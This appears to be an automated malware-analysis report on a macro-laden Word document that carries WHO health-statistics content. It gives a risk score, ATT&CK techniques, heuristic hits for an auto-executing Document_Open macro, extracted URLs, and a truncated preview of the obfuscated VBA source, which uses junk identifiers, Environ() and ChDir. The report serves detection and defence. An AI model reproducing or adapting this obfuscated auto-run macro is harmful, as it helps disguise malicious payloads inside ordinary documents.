MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro that is configured to execute code. The presence of the Environ() function suggests it may be attempting to gather system information or prepare for payload execution. The macro's auto-execution routine and the high heuristic score for p-code auto-execution with execution tokens indicate a strong likelihood of malicious intent, likely to download and execute a second-stage payload. While many URLs were extracted, they were all classified as benign or unknown, and no specific malicious indicators were found within the document body or scripts.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.who In document text (OLE body)
- http://www.childmortality.org/files_v21/download/IGME%20report%202017%20child%20mortality%20final.pdfIn document text (OLE body)
- http://aidsinfo.unaids/In document text (OLE body)
- http://www.haiweb.org/medicineprices/In document text (OLE body)
- https://washdata.org/sites/default/files/documents/reports/2018-01/JMP-2017-report-final.pdfIn document text (OLE body)
- https://washdata.org/sites/default/files/documents/In document text (OLE body)
- http://www.ncdrisc.org/In document text (OLE body)
- http://applications.emroIn document text (OLE body)
- http://apps.whoIn document text (OLE body)
- http://www.childmortality.org/In document text (OLE body)
- http://whohbsagdashboard.com/In document text (OLE body)
- http://whohbsagdashboard.com/#global-strategiesIn document text (OLE body)
- https://creativecommons.org/licenses/by-nc-sa/3.0/igoIn document text (OLE body)
- http://apps.who.int/irisIn document text (OLE body)
- http://apps.who.int/bookordersIn document text (OLE body)
- http://www.who.int/about/licensingIn document text (OLE body)
- http://www.who.int/about/what-we-do/gpw-thirteen-consultation/en/In document text (OLE body)
- http://www.who.int/about/what-we-do/gpw-In document text (OLE body)
- http://www.who.int/gho/en/In document text (OLE body)
- http://www.who.int/gho/enIn document text (OLE body)
- http://www.who.int/gho/publications/world_health_statistics/2017/en/In document text (OLE body)
- https://www.researchgate.net/publication/304576854_Guidelines_for_Accurate_and_Transparent_Health_Estimates_Reporting_The_GATHER_statemenIn document text (OLE body)
- https://www.researchgate.net/publication/304576854_In document text (OLE body)
- http://www.who.int/neglected_diseases/diseases/en/In document text (OLE body)
- http://apps.who.int/nha/database/Select/Indicators/enIn document text (OLE body)
- http://apps.who.int/In document text (OLE body)
- http://www.who.int/gho/publications/world_health_In document text (OLE body)
- http://www.who.int/reproductivehealth/publications/monitoring/maternal-mortality-2015/en/In document text (OLE body)
- http://www.who.int/reproductivehealth/publications/In document text (OLE body)
- http://www.thelancet.com/journals/langlo/article/PIIS2214-109X(17)30325-X/fulltextIn document text (OLE body)
- http://www.thelancet.com/journals/langlo/article/PIIS2214-In document text (OLE body)
- https://data.unicef.org/wp-content/In document text (OLE body)
- http://www.un.org/en/development/desa/population/theme/family-planning/cp_model.shtmlIn document text (OLE body)
- http://www.un.org/en/In document text (OLE body)
- https://esa.un.org/unpd/wpp/Download/Standard/Fertility/In document text (OLE body)
- https://esa.un.orgIn document text (OLE body)
- http://www.who.int/healthinfo/global_burden_disease/estimates/en/index3.htmlIn document text (OLE body)
- http://www.who.int/healthinfo/global_In document text (OLE body)
- http://www.who.int/gho/hiv/en/In document text (OLE body)
- http://www.who.int/In document text (OLE body)
- http://www.unaids.org/sites/default/files/media_asset/Global_AIDS_update_2017_en.pdfIn document text (OLE body)
- http://www.unaids.org/sites/default/files/media_asset/Global_In document text (OLE body)
- http://www.who.int/malaria/publications/world-malaria-report-2017/en/In document text (OLE body)
- http://www.who.int/malaria/publications/world-malaria-In document text (OLE body)
- http://www.who.int/tb/publications/global_report/en/In document text (OLE body)
- http://www.who.int/tb/publications/global_In document text (OLE body)
- http://apps.who.int/iris/bitstream/handle/10665/255016/9789241565455-eng.pdf?sequence=1In document text (OLE body)
- http://apps.who.int/gb/ebwha/pdf_files/WHA66/A66_20-en.pdf?ua=1In document text (OLE body)
- http://www.who.int/gho/neglected_diseases/en/In document text (OLE body)
- http://www.who.int/gho/neglected_diseases/In document text (OLE body)
+68 more URL(s)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 195590 bytes |
SHA-256: 1a44aa7c8294f8c82cfdfd04d2b4b07fab4f759acfb61c5b708c70b1de70990b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim pleader_elastomer As String, havocstilbs As String
Sub educatabilityalumna(educatability)
Dim platbandsnumberer As Variant
Dim prigumbilicus
Dim taxi_agriculture
Call dulcianas.defoliation(platbandsnumberer, "apoplexy diker", "apparatus brittlestar", platbandsnumberer, "Caledonian clawback colonnades detonation Rotarianism")
Dim supranationalismconventionalities As Boolean
Dim edging_adventurer As Long
Dim turntableattics As Long
If prigumbilicus >= buckhounds.disquietude(13947, 17634, prigumbilicus) Then
dahl.acariasissupranationalismconventionalities
contadino.cental
End If
If platbandsnumberer <= supranationalismconventionalities Then
End If
Dim tab_odoriferousness
Dim measure_cenogenesis
Dim soreheadforgiveness As Boolean
soreheadforgiveness = brandering.electioneering(supranationalismconventionalities)
Call burnsides.carter(15909, 24581)
Dim kavaiceskater
Dim blockhouses_weazand
Dim rammerowelty
Dim longitudesimplements As String
Dim Vicmillefleurs
Call drapes.cankers(4525, "buntlines Alanbrooke clockwatcher", 30068, "detoxifications barkeepers cultus")
Dim crams_reversers As String
Dim raider_niellists As Boolean
Dim gourmet_foyers As Variant
Dim dunny_Roxana
Dim Lautrectularaemia
raider_niellists = 26065
If raider_niellists < dimwits.Nilotic("eggcups Corneille buckboards", gourmet_foyers) Then
Dim potophites
Dim delegationconsistences
Dim scribblersmoquette As String
Dim dissentient_ayres
If dunny_Roxana <= clamminess.belle(raider_niellists) Then
If potophites = causing.amphipod(6453, 25364, 19697, gourmet_foyers, potophites) Then
raider_niellists = "corruptionists bethel chine"
doucepere.admonitions
delegationconsistences = actings.disparager(21977, dissentient_ayres)
Dim gharry_ascus
Dim binnacles_Volkslied As Boolean
Dim codonrancheries
Dim bellarmines_ironings
dissentient_ayres = "Cynewulf Cara audiences Taoism cytotoxin consuetudinaries"
Dim oc_popup As String
Dim prognosissquirrels As Long
Dim Charlottetown_craziness As Boolean
dunny_Roxana = "coacervation causa"
End If
gourmet_foyers = desorptions.confectionery(prognosissquirrels, "adjutant convertor", 1189, raider_niellists, 3212)
End If
bimonthly.carbonadoes 16540, 1913
Dim sealyhamdoabs As Long
Dim pentaprismimpost As String
Dim whamming_arachnoid
binnacles_Volkslied = barbarian.dioxide(delegationconsistences, Chippendale.bedizenment("basket andesine debaucheries Seeger consonants", 7638, 3230), whamming_arachnoid)
scribblersmoquette = bathtubs.denouncers("crossquestions Trojans cursoriness Parisian cavy buddles", whamming_arachnoid, "Essequibo Keble diatribe Flanders drabness", scribblersmoquette)
borrowers.McCartney "coughers Grappelli bucktooth", binnacles_Volkslied
codonrancheries = 12864
End If
Dim baguette_subtype
Dim triptyquestatu As Boolean
If scribblersmoquette >= Insectivora.elucidation Then
Dim lotionequator
Dim noncom_subwarden
Dim firmness_santal As Integer
Dim thermoclinesdharna As Variant
chlorofluorocarbon.Jeremy "citification diarrhoea Monegasques clecks"
oc_popup = 20862
End If
Dim monotheists_TracksTotal
Dim philatelist_bronchus As Integer
Dim profanitygarrya
profanitygarrya = "desperate bathymetry Salem Treviso Cainite"
Dim muddlersgratulation
Dim hellershraddha As String
Dim myologytedders
Dim logogriphsocc As Boolean
Call diarist.cloudcuckooland("Dumbarton baker daiquiris dozen Pentecost")
If myologytedders < philatelist_bronchus Then
crucifixions.carpetbag
End If
cribbiting.Apuleiusprofanitygarrya , "Arafat aloes divider bibs Ormandy circumflexes", 14609
muddlersgratulation = 27241
philatelist_bronchus = 4348
crams_reversers = Environ(educatability)
ChDir (crams_reversers)
Dim buyoutwaterrates As String
Dim propagandism_flumes As Variant
Dim soixanteneuf_sp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.